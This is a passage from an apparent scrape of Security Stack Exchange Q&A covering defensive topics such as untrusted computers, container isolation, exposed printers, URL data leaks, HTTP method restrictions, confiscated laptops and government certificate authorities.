"https://security.stackexchange.com/users/16906/"
]
} |
198,726 | Suppose I am in a situation that I am forced to log in to my account using someone else's computer . Is there any secure way to do that so that I would be sure that my login details (i.e. password) are not recorded by any means (e.g. keystroke logging)? Or if it is impossible, what are the ways to at least mitigate the risks? Although related, but note that this is a bit different from this question since I am not using my own computer to log in. | This is an interesting question! The rule of thumb is that if someone else has control of the device (and they're determined enough), they will always be able to monitor and modify all of your actions on the device. We can (to a somewhat limited extent) get around this though! Two-factor authentication can be used to ensure that even if someone has your password, they cannot get into your account without also having access to a separate device (owned and controlled by you). Keep in mind that once you log in, the computer ultimately has control over your interaction with the website, and as a result it could trivially see everything you do on the site and even modify your requests to the site (including not logging you out properly when you're done, and potentially changing your login details to lock you out of your own account). This all depends on how worried you are about being attacked - if you're just logging into Facebook on a friends computer, you can probably trust that when you hit "Log Out", it actually logs you out. If you're logging into something really important, however, you may want to stick to devices you control. Additionally, consider the following, via user TemporalWolf Some websites allow for the generation of single-use one time passwords which sidesteps any sort of password logging... as you mentioned, this doesn't stop them from mucking with the now authenticated session. | {
"source": [
"https://security.stackexchange.com/questions/198726",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/113984/"
]
} |
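For the "single-use one-time passwords" point, here is a compact sketch of RFC 6238 TOTP using only the Python standard library. The shared secret is a well-known placeholder value, and real deployments would normally rely on an existing authenticator app or library rather than this hand-rolled version.

import base64, hashlib, hmac, struct, time

def totp(base32_secret, period=30, digits=6):
    key = base64.b32decode(base32_secret, casefold=True)
    counter = int(time.time()) // period
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # placeholder secret, same base32 format authenticator apps use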
198,780 | JavaScript has certain limitations such as preventing reading and writing to disk and not allowing access to other browser windows or domains. But is that all that's needed to prevent malicious code from running? JavaScript is pretty powerful, and it seems odd that browsers will unquestioningly run all JavaScript code they are given. How is that safe? | The standard is designed to be safe. The implementation may not be. The browser isolates JavaScript, as it executes within a browser process itself. It cannot do anything which is not permitted by the browser JavaScript interpreter or JIT compiler . However, owing to its complexity, it's not at all uncommon to find vulnerabilities that allow JavaScript to compromise the browser and gain arbitrary code execution with the privileges of the browser process. Because these types of security bugs are so common, many browsers will implement a sandbox. This is a protection mechanism that attempts to isolate a compromised browser process and prevent it from causing further harm. The way the sandbox works depends on the browser. Firefox has very limited sandboxing, whereas Chrome and Edge have significant sandboxing. However, despite this defense in depth, browser vulnerabilities can often be combined with sandbox escape vulnerabilities. See https://madaidans-insecurities.github.io/firefox-chromium.html for more information on Firefox vs Chromium. | {
"source": [
"https://security.stackexchange.com/questions/198780",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/183656/"
]
} |
198,951 | I am trying to understand why an attacker would want to wait to use a zero-day exploit. I have read that an attacker does not want to waste the zero-day because they are typically very expensive to obtain in the first place, but it is not clear to me what is meant by “waste” here. Zero-days can be discovered by the community (e.g. security researchers) which would render it useless. In this sense, the zero-day has been wasted by the inaction of the attacker. Is there a risk with using the zero-day exploit too soon? It seems that an attacker would want to minimize the chances of the zero-day being discovered, and thus use it as quickly as possible. Question: What factors would cause the attacker to wait to use a zero-day exploit? | It's more likely that you'll burn a 0day by using it than by sitting on it. There's a fine balance between sitting on a 0day so long that it gets discovered by someone else and patched, and using it too early and unnecessarily, burning it . The balance tends to weigh in favor of waiting longer, since a good 0day is going to be obscure enough that it won't be quickly found. The biggest risk actually isn't discovery in that case, but obsolescence when the vulnerable code is re-written or removed for completely unrelated reasons, and the 0day exploit no longer works. Most of the time, however, an attacker simply doesn't need to use it. If I have a valuable Linux local privilege escalation exploit, why would I use it when a little bit of extra reconnaissance tells me I can use an old exploit against an improperly patched privileged daemon? Better to keep it in the rainy day fund. There are a few other reasons 0days may be kept for long periods: Some people simply hoard 0days for the sake of it. This is all too common. Maybe you borrowed the 0day from someone, in which case burning it would piss them off. Sometimes a 0day broker is sitting on them while waiting for the right client. The 0day may be useless on its own, needing to be chained with other exploits to work. There was some interesting research presented at BH US which analyzed the life of 0days. | {
"source": [
"https://security.stackexchange.com/questions/198951",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/192714/"
]
} |
199,222 | Accessing web server log files via a URL has a certain appeal, as it provides easy access. But what are the security risks of allowing open access to log files? | There are clearly two different lines of defense here. First, highly sensitive data (secrets, typically passwords) should never be logged, to avoid compromise through the logs. But the more an attacker knows about a system, the easier it is to build or use a targeted attack. For example, software versions are not highly sensitive and can reasonably feed a log, but they can help in choosing an attack vector. So the second line of defense is that someone who does not need access to the logs should not be able to read them. That is a direct application of the least-privilege rule. It is common to provide log access to the dev/maintenance team, but you should evaluate the risk/gain ratio, according to your access security tools. The most secure system is the one that cannot be accessed by any user, but its usability is very low too... | {
"source": [
"https://security.stackexchange.com/questions/199222",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/176713/"
]
} |
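A small sketch of the first line of defense ("never log secrets"): strip sensitive query parameters from a URL before it is written to an access log. The parameter names below are just common examples, not an exhaustive list.

from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

SENSITIVE = {"password", "token", "apikey", "session"}  # assumed parameter names

def redact_url(url):
    parts = urlsplit(url)
    query = [(k, "REDACTED" if k.lower() in SENSITIVE else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(query)))

print(redact_url("https://example.org/login?user=bob&password=hunter2"))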
199,226 | Recently it came to my attention that someone hacked around 50,000 printers and used them to print the message they wanted to. ( link ) As someone who doesn't have a lot of knowledge about networks or hacking, what would be the steps to take to protect my printer or similar accessories from such attacks in the future? | Don't leave your printer exposing port 9100 to the internet. This large-scale printer attack is nothing new. It's happened previously and is very simple to execute. The attacker likely used Shodan to scan the entire internet for printers with port 9100 open to the internet. Due to the way raw printing over port 9100 works, all that is required after this is to connect to the printer on TCP port 9100 and send the text you want printed. Preventing this attack All you need to do is close port 9100 externally. If there is a requirement to print remotely, this is possible in a number of ways: use a VPN to connect to the network, making the printer accessible as if it were on your local network; use a different printing protocol, IPP , which is designed to be used over the internet and has built-in support for authentication; or use Google Cloud Print. | {
"source": [
"https://security.stackexchange.com/questions/199226",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/175806/"
]
} |
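To check whether a printer is reachable on the raw-printing port from a given network position, a simple TCP connect test is enough. This Python sketch uses a placeholder address from the TEST-NET range and should only ever be pointed at devices you own.

import socket

def port_9100_open(host, timeout=3):
    try:
        with socket.create_connection((host, 9100), timeout=timeout):
            return True
    except OSError:
        return False

print(port_9100_open("203.0.113.10"))  # placeholder address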
199,557 | Assume that my Internet history is made public (accidentally or on purpose). And this release is over 24 hours since the visits were made. Also, assume that there aren't embarrassing sites on there: there isn't any blackmail potential. (My most embarrassing page visited in the last week is actually the TV tropes page for my little pony , for which I have a valid reason and a witness). What potential attacks does this allow? I'm mildly concerned about seeing massive links like: hxxps://kdp.amazon.com/en_US/ap-post-redirect?openid.assoc_handle=amzn_dtp&aToken=Atza%7CIwEBIO9mWoekr9KzK7rH_Db0gp93sewMCe6UcFPm_MbUhq-jp1m7kF-x0erh6NbjdLX3bm8Gfo3h7yU1nBYHOWso0LiOyUMLgLIDCEMGKGZBqv1EMyT6-EDajBYsH21sek92r5aH6Ahy9POCGEplpeKBVrAiU-vl3uIfOAHihKnB5r2yXPytFCITXM70wB5HBT-MIX3F1Y2G4WfWA-EgIfZY8bLdLangmgVq8hE61eDIFRzcSDtAf0Sz7_zxm1Ix8lV8XFBS8GSML9YSwZ1Gq6nSt9pG7hTZoGQns9nzKLk7WpAWE8RazDLKxVJD-nDsQ9VdBJe7JZJtD7c77swkYneOZ5HXgeGFkGhKsMnP7GSYndXhC_PqzY251iDt0X7e5TWvh86WZA0tG2qZ_lyIagZtB3iw&openid.claimed_id=https%3A%2F%2Fwww.amazon.com%2Fap%2Fid%2Famzn1.account.AEK7TIVVPUJDAK3JIFQIQ77WZWDQ&openid.identity=https%3A%2F%2Fwww.amazon.com%2Fap%2Fid%2Famzn1.account.AEK7TIVVPUJDAK3JIFQIQ77WZWDQ&openid.mode=id_res&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.op_endpoint=https%3A%2F%2Fwww.amazon.com%2Fap%2Fsignin&openid.response_nonce=2018-12-11T13%3A46%3A52Z4004222742336216632&openid.return_to=https%3A%2F%2Fkdp.amazon.com%2Fap-post-redirect&openid.signed=assoc_handle%2CaToken%2Cclaimed_id%2Cidentity%2Cmode%2Cns%2Cop_endpoint%2Cresponse_nonce%2Creturn_to%2CsiteState%2Cns.pape%2Cpape.auth_policies%2Cpape.auth_time%2Csigned&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.auth_policies=http%3A%2F%2Fschemas.openid.net%2Fpape%2Fpolicies%2F2007%2F06%2Fnone&openid.pape.auth_time=2018-12-11T13%3A46%3A52Z&openid.sig=5cx5iHjeLyWTTA9iJ%2BucszunqanOw36djKuNF6%2FOfsM%3D&serial=&siteState=clientContext%3D135-4119325-2722413%2CsourceUrl%3Dhttps%253A%252F%252Fkdp.amazon.com%252Fbookshelf%253Flanguage%253Den_US%2Csignature%3DgqJ53erzurnmO1SPLDK1gLwh9%2FUP6rGUwGF2uZUAAAABAAAAAFwPv8dyYXcAAAAAAsF6s-obfie4v1Ep9rqj in my history and worrying that secure information might be passed in a URL somewhere. I am aware that this makes it easier to impersonate my identity, and I'm mostly interested in the leakage of information via the URL itself. I have a general interest, but this is motivated by a test project I'm running. | Your question might be more undefined than you realise. Any kind of data can be passed using URL parameters. Usernames, passwords, authentication tokens, settings, form data, or anything the web developer chooses. It's not always good practice to use URL parameters to for this, but it is always possible . And it's entirely up to each individual web developer on each individual page (not just site) as to what might be exposed and when. So you might not be able to predict what might be exposed. So, to answer your question, in the worst case, you could experience a complete and utter disclosure of any amount of personal data including credentials. By request, I did a search for the practice of "passwords in URL parameters" and restricted results to this year. Here's one of the top hits: https://answers.splunk.com/answers/622600/how-to-pass-username-and-password-as-a-parameter-v.html That's a forum from Feb 2018 from a major, publicly traded company talking about how to do this. 
Here is OWASP's official page on this vulnerability: The parameter values for 'user', 'authz_token', and 'expire' will be
exposed in the following locations when using HTTP or HTTPS: the Referer header, web logs, shared systems, browser history, the browser cache, and shoulder surfing. | {
"source": [
"https://security.stackexchange.com/questions/199557",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/115656/"
]
} |
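To see concretely what a leaked history entry exposes, you can decompose the query string of any logged URL; parse_qsl also undoes the percent-encoding. This Python sketch uses a shortened, made-up URL rather than the real one from the question.

from urllib.parse import urlsplit, parse_qsl

leaked = "https://example.org/ap-post-redirect?openid.mode=id_res&aToken=Atza%7Cexample"  # made-up
for name, value in parse_qsl(urlsplit(leaked).query):
    print(f"{name} = {value}")
# Anything printed here - tokens, identifiers, state - is visible to whoever has the history.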
199,776 | TL;DR: Is there a valid reason to demand a software vendor to stop using HTTP PUT and DELETE methods in a web application and use only GET and POST ? The application uses frameworks to whitelist allowed request paths and methods. In other words, is there any difference from the security standpoint in allowing the deletion of a record via either DELETE or POST methods without changing the code and security checks in it? Full question Our customer configured their Tomcat instance with the following, according to their corporate standard: <security-constraint>
<web-resource-collection>
<web-resource-name>restricted methods</web-resource-name>
<url-pattern>/*</url-pattern>
<http-method>CONNECT</http-method>
<http-method>PUT</http-method>
<http-method>DELETE</http-method>
<http-method>OPTIONS</http-method>
<http-method>TRACE</http-method>
</web-resource-collection>
<user-data-constraint>
<transport-guarantee>CONFIDENTIAL</transport-guarantee>
</user-data-constraint>
<auth-constraint />
</security-constraint> This, among the Http Header Security Filter configuration, made our application break. Our application provides the same HTTP Header security features in Spring Security. Also, our application is RESTful, so we widely use PUT and DELETE methods for file upload. In future releases, we are also planning to use websockets (but from a search, they don't use CONNECT, which is for proxying). Our customer said that they will have to raise a policy exception in production in order remove the offending lines from Tomcat configuration and make the application work. The security exception policy is triggered when vendor applications do not comply with security requirement in a way that 1) fixing the issue cannot be done within the schedules and 2) no evident vulnerability is found. Exception policies require senior management approval. However, security policy exceptions require our customer to engage the vendor within 6 months in "fixing the security issue". Within 6 months, vendor has to provide costs and deadlines to meet the security policy. This means that they will return to me asking for a quotation to make the application work with enabled HTTP method filtering and HTTP Header Security filter. I don't want to do them a favour and change all Ajax calls from RESTful patterns to GET/POST only, not even for money if possible. I would like instead to prove that their security implementation is not only incompatible, but redundant, with regards to the security implementations within the application. If we set a precedent in doing this customer a favour with PUT and DELETE requests, we will have to face requests like "be compatible with my framework/policy/environment" from a large customer base (all banks and financial institutions). In the future, that may turn against our cost management. Question is, as in the TLDR, could using PUT and DELETE methods alone, regardless of the security features of the application, pose a security risk? If proven that the sole HTTP verb does not pose a security risk, I will be able to raise a permanent exception policy and confront the IT staff with solid argumentation. Edit I work in a software factory that deploys the same product instance to a large number of customers and our cloud. We are fully using all the tools we have on board, including the REST pattern. We are planning to employ HATEOAS, WebSockets, resumable file downloads, and everything the web technology can offer us to deliver better experience. Yes, sounds like a marketing line. Anyway, security is still a concern in our products. | I suspect this is a case of someone zealously applying "best practices" that they don't understand. HTTP Verb Tampering Attack The reason this best practice exists is because of the HTTP Verb Tampering Attack. From this article : Many Web server authentication mechanisms use verb-based authentication and access controls. For example, an administrator can configure a Web server to allow unrestricted access to a Web page using HTTP GET requests, but restrict POSTs to administrators only. However, many implementations of verb-based security mechanisms enforce the security rules in an unsecure manner, allowing access to restricted resources by using alternative HTTP methods (such as HEAD) or even arbitrary character strings. So someone decided that because some apps are badly-written, all apps should be banned from accepting HTTP verbs other than GET or POST, because ... you know ... mumble mumble SECURITY!! 
My opinion (possibly incomplete / incorrect, please post comments) : Pure HTML / CSS / js content should be restricted to GET and POST because these are the only verbs allowed in the HTML spec . APIs (AJAX, REST) should be allowed to use any verb from the HTTP spec , that said: Be aware that even if your application-layer correctly enforces verb-based access controls, your webserver front-end may not, so you owe it to your customers to do some security testing and make sure your app enforces proper authentication and access controls on all verbs that you support. I recommend following the OWASP testing guide . It sounds like your app is fine and your customer has an overly-zealous security policy. As an aside, HEAD is an interesting example; some security scanners seem to complain if your app responds to HEAD requests, because some apps will return valid headers without invoking the proper auth checks. However, most properly designed apps will process a full GET and then only return the headers, including the correct content-length: . So for apps using modern frameworks, there is probably no way to bypass auth logic on your GET controller. Do some quick tests though! (Thanks @usr-local-ΕΨΗΕΛΩΝ for pointing this out in comments. See this Stack Overflow post for detail on how Spring MVC handles this.) | {
"source": [
"https://security.stackexchange.com/questions/199776",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67189/"
]
} |
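A rough sketch of the "do some security testing" suggestion: probe an endpoint you own with several HTTP methods and compare the status codes, using the third-party requests library. The URL is a placeholder for a test system, and a 401/403 on every unauthenticated method is the result you want to see.

import requests

URL = "https://staging.example.org/api/records/1"  # placeholder, test systems only

for method in ("GET", "POST", "PUT", "DELETE", "HEAD", "PATCH", "FOO"):
    resp = requests.request(method, URL, timeout=10)
    print(f"{method:6s} -> {resp.status_code}")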
199,905 | Recently, I have heard of a new virtualization tech called containers. Suppose the container has been compromised, does this mean the host is also compromised (since the container is a process on a host)? In terms of security, is a VM (virtual machine) more secure than containers? | If the kernel is compromised in the container, the host is compromised. Ostensibly, a compromised container should not be able to harm the host. However, container security is not great, and there are usually many vulnerabilities that allow a privileged container user to compromise the host. In this way, containers are often less secure than full virtual machines. That does not mean that virtual machines can't be hacked . They are just not quite as bad. If the kernel is exploited in a virtual machine, the attacker still needs to find a bug in the hypervisor. If the kernel is exploited in a container, the entire system is compromised, including the host. This means that kernel security bugs, as a class, are far more severe when containers are used. Containers are often implemented by using namespaces : A namespace wraps a global system resource in an abstraction that makes it appear to the process within the namespace that they have their own isolated instance of a global resource. Changes to the global resource are visible to other processes that are members of the namespace, but are invisible to other processes. Unfortunately, Linux namespaces typically expose a much greater attack surface area from the kernel. Many kernel vulnerabilities are exploitable in namespaces. While not every container solution uses Linux namespaces, they all use the same kind of technology, with the same security issues . Some containers, like Docker, are capable of making use of a syscall filtering framework called seccomp to reduce the attack surface area of the kernel. This is an improvement, but isn't enough. If you are not using containers and have no need for (unprivileged) user namespaces, you have the option to disable them by setting user.max_user_namespaces = 0 to improve security. From Daniel Shapira : [...] kernel exploits can be devastating for containerized environments. This is because containers share the same kernel as the host, thus trusting the built-in protection mechanisms alone isn’t sufficient. | {
"source": [
"https://security.stackexchange.com/questions/199905",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/194732/"
]
} |
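A tiny sketch of checking the hardening knob mentioned above on a Linux host: read the user.max_user_namespaces sysctl via /proc, where a value of 0 means unprivileged user namespaces are disabled.

from pathlib import Path

path = Path("/proc/sys/user/max_user_namespaces")
if path.exists():
    value = int(path.read_text().strip())
    print("user namespaces disabled" if value == 0 else f"user namespaces allowed (max {value})")
else:
    print("sysctl not present on this kernel")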
199,971 | My laptop was confiscated by the military institute of my country and they made me give them all my passwords (I cannot tell you the name of my country). They did not give it back to me for one week (yes, it was out of my sight for a while).
I nuked it from orbit but I just realised that it was on sleep state for 2 days and not in shutdown state, so it was connected to my modem via wifi. Does it need to be worried about? and I need to make sure if they have added something to monitor my activities or steal my data or not? And if they have done that, what should I do to prevent them. I have double checked the laptop physically and there is no sign of screw or plastic deformation. Is that still possible that they have compromised its hardware? | If the device left your sight for any amount of time, replace it. It can no longer be trusted. The cost to assure it can still be trusted significantly exceeds the cost of getting a new one There is effectively no way to verify that the hardware has not been tampered with without significant expertise and employing non-trivial resources. The only solution is to replace the laptop and all associated components. Without knowing your country or other aspects of the situation you are in, there is no way for me to comment on the likelihood of this, only on the technical feasibility. If you do need to verify the integrity of the laptop, there are a few things to check (non-exhaustive): Weight distribution - Verify the precise weight of each component (ICs, PCB, etc). Weight distributions can be analyzed using gyroscopic effects. This requires having uncompromised equipment nearby for comparison. Extremely precise measuring equipment is required. You'll need to be aware of the different tolerances each part has in order to know what is anomalous. Power consumption - Verify the power consumption of each component over time. Backdoors often use power, and their presence can sometimes be detected with a power analysis attack. Do not rely on this however, as integrated circuits can use extremely little power nowadays. PCB X-ray inspection - Use X-rays to view the circuit board internals. This requires expensive equipment for a multi-layer printed circuit board such as a laptop motherboard. It also requires many man hours of intensive inspection of each square micrometer of the device. This is probably the easiest to do, although still takes specialized equipment and skills. IC inspection - Physically remove the various layers on integrated circuits ("decapping") and analyze the internal die. For anything much more complicated than an 8051 microcontroller, this will require significant expertise and is not possible without a high level of domain knowledge and a lab. But this would have to be done for everything from the main chipset to every CPLD on the board. Do you have a full-face respirator and a fume hood for all the acid you'll need to use? Sounds excessive? It is, but this is what you would have to do to have a good level of confidence that no malicious hardware modifications have been made. It will be cheaper just to buy a new laptop. Note that this is not intended to be practical advice, and it is not even close to complete even if it was. It's meant only to illustrate this near-impossibility of searching for sophisticated hardware implants. I nuked it from orbit but I just realised that it was on sleep state for 2 days and not in shutdown state, so it was connected to my modem via wifi. Does it need to be worried about? In theory, compromised hardware or firmware would be made to compromise your wireless access point or other devices listening in. While a suspended state (sleep mode) normally also disables the NIC, you cannot make that assumption if the hardware is compromised. 
However, while this is theoretically possible, it would require a far more targeted attack, and most military groups will not want to give away their 0days by shooting them at any random nearby wireless devices. Unfortunately, it is also theoretically possible that your modem has been compromised. If that is the case though, I think it'd be incredibly unlikely that it was done by your exploited laptop, as they could have just taken over your modem through your internet connection (TR-069 is a bitch), assuming they can control or compromise your ISP. If they have tampered with your hardware, it's much more likely that they have only done so for surveillance purposes, not to spread some silly worm. I have double checked the laptop physically and there is no sign of screw or plastic deformation. Is that still possible that they have compromised its hardware? Absolutely. There are many ways to open a laptop without that fact being apparent. While many sophisticated chassis intrusion detection mechanisms exist (some that even detect small changes in air pressure that would indicate a person messing with it), there are some "ghetto" techniques which you may be able to use in the future. One technique is to sprinkle nail polish with glitter on the joints of the system, inside and out. Take a high-resolution photo of this (and don't store the photo on the computer!). If the device is opened, the precise layout of the glitter will be disrupted, and it will become exceptionally difficult to put it back in place. You can compare it with the stored photo and look for subtle differences. This is sufficient to detect tampering by most adversaries, if done right. The term for this is tamper-evidence , which is any technique that makes it difficult to tamper with a device without that fact being noticeable. More professional options would include bespoke tamper-evident security tape or holographic stickers. There are lots of epoxy potting solutions too (but beware of overheating!). Unfortunately, this can only help you in the future and will obviously be incapable of protecting your system retroactively. But consider how likely it is that they really compromised it. | {
"source": [
"https://security.stackexchange.com/questions/199971",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/194797/"
]
} |
200,243 | My bank card recently expired. I got a new one and this one turned out to be "lucky": its CVC code was 000 . For a few months I used it extensively, both online and offline, without any difficulties - until the day when I entered my card details on Booking.com. I filled in the form, clicked "submit" - only to see the page discard the value in the CVC field and demand that I enter it again. I contacted support. They confirmed that CVC code "000" is not acceptable because it is considered not secure enough (not an exact quote unfortunately, as the conversation was in Estonian), and they suggested that I order a new bank card where the CVC code would be different from "000". That puzzled me. As a former tester, I'm quite used to situations where I think I'm reporting a bug and then I'm told it is actually a feature, but this time it was somewhat against common sense. My current work is also related to information security and I can think of three reasons their claim doesn't make sense: CVC is not just a random number, there is a certain algorithm of generating it. This, in turn, means that all values are equally probable and some certain numbers can't just be excluded from it. I have already used this card with a number of other online services, including Amazon Web Services, whose security is out of any doubts. I don't quite understand what "not secure enough" means. Are "111" or "999" secure enough? If not, how about "123" or "234"? Again, it's not something I pick myself, it's something I'm given by a bank, and if the bank thinks it's secure, then it must be treated as such. Their response was very polite but not very helpful: " We totally understand your frustration and we are really sorry about causing you inconvenience. We handed your reasoning over to our management - they responded that 000 is considered invalid, and this is also a way banks indicate that the card is a forgery ". I forwarded the mail chain to my bank and asked for their advice. They told me they'd issue a new card for free, which solved the problem for me. However, I still wonder: Are there any official regulations/prescriptions (from Visa/MC or elsewhere) or any best practices regarding "all-zero" CVC/CVV codes? Especially that bit about banks allegedly using 000 as an indication of a forgery - sounds like complete nonsense to me. I tried googling, but couldn't find anything. From a practical point of view, how reasonable it is to decline "000" as insecure? I listed my concerns above, but maybe I'm missing something? Update : Tough choice on which answer to accept... I liked the answer from Alexander O'Mara a lot - it is detailed and to the point. The latest revision of Harper's answer also seems very reasonable. Yet I eventually decided to accept the answer by Zoey - it seems the most relevant, as it, besides everything else, also sheds some light on the internals of hotel business. Thanks everyone for your answers and comments! What I'm going to do now is contact Booking.com support again and insist on getting this fixed. Will let you know about the outcome. Update 2 : After several months of trying to contact Booking.com's support I officially give up. I haven't gone any further than a countless number of support tickets that were not even confirmed, not to mention being reacted on, and a couple of phone calls where I explained the situation and got nothing but a canned email "we are trying very hard to solve your problem". 
Bottomline: Booking.com's support doesn't work - unless your problem is very standard, it won't be solved nor escalated to higher management. The bug still exists. I'm now assured that it is nothing but a software bug, because CVC "000" is perfectly accepted when you add a new card, but it doesn't work when you are trying to update an expired (or otherwise invalid card). Here's the repro steps: Create a new booking that requires immediate payment. Enter an invalid card (expired or blocked). When the system sends a notification that the card can't be processed, select "update card details" and enter details of a valid card with CVC code 000. Expected result: the card data gets accepted for further processing. Actual result: the entered CVC code gets discarded and the dialog window complains that CVC code is not entered. | Alexander O'Mara provided a correct answer , but having worked in a hotel that was using booking.com I believe I can provide additional information about the reason that CVV was denied. Every day the hotel I worked in would receive around 50 bookings, a quarter of these bookings would be using fake credit card details, and about 90% of people using fake credit card details would not show up. This resulted in a lot of guesswork when assigning rooms, we would often try to guess if the person will show up just based on their credit card details, and also sometimes take into consideration the name, location, how many days they will be staying, etc.
We would also try to call the day before to confirm bookings, so that these fake bookings result in a minimal interruption to the business. Blocking CVV 000 is just booking.com's lazy attempt to reduce the amount of fake bookings. Some other CVVs are blocked as well. The reason why booking.com blocks the CVV and other websites do not is because other websites generally attempt to charge the credit card immediately, while booking.com only forwards information to the hotels which charge the credit card on the day of arrival. | {
"source": [
"https://security.stackexchange.com/questions/200243",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/195159/"
]
} |
200,261 | Recently there have been a lot of news articles which say that Facebook will very soon add advertising to WhatsApp, yet will keep the end-to-end encryption (source) : [M]essages will remain end-to-end encrypted. There are no plans to change that. I am trying to understand how advertisement is possible while keeping end-to-end encryption. I understand that there are several options: Advertisements are not targeted according to words used in messages, just general ads. It is possible to send additional/duplicate packets with the same information to the server, which also uses "end-to-end encryption". Yet, if that's the case, it's sort of "telling the truth but not all the truth". I find it hard to believe that such a method would be used. Are there other ways to do both ads and e2e encryption that you can think of? | Your WhatsApp account is linked to your Facebook account. They know lots about you from your Facebook activity, and can use that to direct targeted ads at you on WhatsApp, without knowing anything at all about the content of your WhatsApp messages. | {
"source": [
"https://security.stackexchange.com/questions/200261",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/145366/"
]
} |
200,720 | Let's assume I have a server set up with an email address like [email protected]. Now I have distributed my business card with the e-mail address to all people all over the world and they keep sending me confidential emails. But now I don't feel like paying for the domain mydomain.tld anymore. Now if someone buys the domain and creates a mx record pointing to the his own mail server he can read all my confidential emails the people are sending me right? No, I can't tell them to stop sending confidential mails because I can't contact them. Are there ways to prevent that or is the only option I have is to pay for the domain until I die? | Now if someone buys the domain and creates a mx record pointing to the his own mail server he can read all my confidential emails the people are sending me right? If they register the domain name, they will receive all email being sent to it from that point on. They will not have retroactive access to previously sent emails. There is nothing to fundamentally prevent this. Are there ways to prevent that or is the only option I have is to pay for the domain until I die? You can request that all contacts to you encrypt their communications with PGP using your public key, which will prevent anyone who obtains the domain later from reading new messages, but it requires people actually use PGP, which may not be likely if you are distributing the address to average people in a business card. However, if you maintain or at least renew the domain for, say, 20 years, then what are the chances that anyone is going to seriously send an email to such an ancient address? I asked the question on the Law Stack Exchange whether or not there would be any legal recourse to someone using your domain, and the answer was no: https://law.stackexchange.com/q/35917/15724 | {
"source": [
"https://security.stackexchange.com/questions/200720",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/195868/"
]
} |
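As an illustration of the PGP suggestion in the answer above, here is a minimal sketch using the third-party python-gnupg package; the recipient address is a placeholder and the recipient's public key is assumed to be imported into the local GnuPG keyring already. Mail encrypted this way stays unreadable to whoever registers the domain later, since they only ever receive ciphertext.

# Sketch: a sender encrypts a message to the recipient's PGP public key, so a
# future owner of the receiving domain only ever sees ciphertext.
# Assumes the third-party python-gnupg package and an already-imported key.
import gnupg

gpg = gnupg.GPG()  # uses the default local keyring

message = "Confidential text intended only for the key holder."
result = gpg.encrypt(message, "someone@mydomain.tld")  # placeholder address

if result.ok:
    print(str(result))          # ASCII-armoured ciphertext, safe to email
else:
    print("Encryption failed:", result.status)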
200,725 | I was recently wondering whether there exists a way to make sure my government is not swapping out SSL certificates in order to intercept the traffic. I know almost all browsers are complaining in case of a self-signed certificate. But what prevents a government to issue their own keychain? One can imagine compromising the repositories containing packages with CA certificates and then issuing their own certificate in order to decipher the traffic. All the traffic is going through government loyal tier 1 operator which also has monopoly rights on providing Internet access. If that is not a possible case, what mechanism is preventing them from doing it? | If your adversary is a powerful nation-state threat actor, web PKI will not protect you. Nothing is preventing them from issuing their own certificate. In fact, many governments run their own certificate authorities, such as the US FPKI and affiliates . See a list of CAs currently trusted by Firefox: Government of France Government of Hong Kong (SAR), Hongkong Post Government of Japan, Ministry of Internal Affairs and Communications Government of Spain, Autoritat de Certificació de la Comunitat Valenciana (ACCV) Government of Spain (CAV), Izenpe S.A. Government of The Netherlands, PKIoverheid Government of Taiwan, Government Root Certification Authority (GRCA) Government of Turkey, Kamu Sertifikasyon Merkezi (Kamu SM) While Firefox currently refuses to trust the US FPKI, it still trusts many other government-run CAs, and a sophisticated nation-state actor absolutely has access to some existing, commercial CAs. Chrome, Internet Explorer, and Edge use the system trust store which, for Windows, does include many government certificate authorities, including the US FPKI. Any of these could be used to sign a valid certificate for any website and your browser would happily trust them without batting an eye. While the new and experimental standard for Certificate Transparency (CT) helps reduce the impact of mistakenly-issued certificates, it does not protect against a dedicated attacker who controls a malicious CA. Once it has seen greater adoption it may, however, make it easier to spot malicious or misbehaving CAs after a short period of time, but it will not prevent the attack immediately as it is performed. Some browsers use certificate pinning where important and high-profile domains are validated against a hardcoded list of permitted certificate authorities. Signing a fraudulent certificate for those domains would require compromising the CA that they currently use. Unfortunately, this only applies to a small handful of domains and does not protect the web at large. A partial solution would be to refuse to trust a domain without the .gov TLD whose certificate was issued by a government CA, which could be implemented client-side, but it would likely have little real-world impact. An adversarial government is not going to sign a malicious website with a state-run CA, since that would immediately attribute the attack to them. Rather, they would exploit covert relationships with existing CAs to trick them or force them into signing the certificate. CT, as mentioned in the previous paragraph, would detect this and the attack would be quickly noticed, but it does not prevent it. | {
"source": [
"https://security.stackexchange.com/questions/200725",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/195874/"
]
} |
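The answer above names certificate pinning as a partial defence; below is a minimal client-side sketch with only the Python standard library. The host and the pinned SHA-256 fingerprint are placeholders: the real fingerprint has to be recorded over a channel you already trust.

# Sketch: pin the server certificate's SHA-256 fingerprint. A fraudulent
# certificate issued by any CA (state-run or otherwise) changes the
# fingerprint, so the connection is refused even though it "validates".
import hashlib
import socket
import ssl

HOST = "example.com"                        # placeholder host
PINNED_SHA256 = "replace-with-known-fingerprint"

ctx = ssl.create_default_context()          # normal CA validation still applies
with socket.create_connection((HOST, 443), timeout=10) as sock:
    with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
        der_cert = tls.getpeercert(binary_form=True)

fingerprint = hashlib.sha256(der_cert).hexdigest()
if fingerprint != PINNED_SHA256:
    raise SystemExit("Certificate fingerprint changed - possible interception")
print("Pinned certificate matched")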
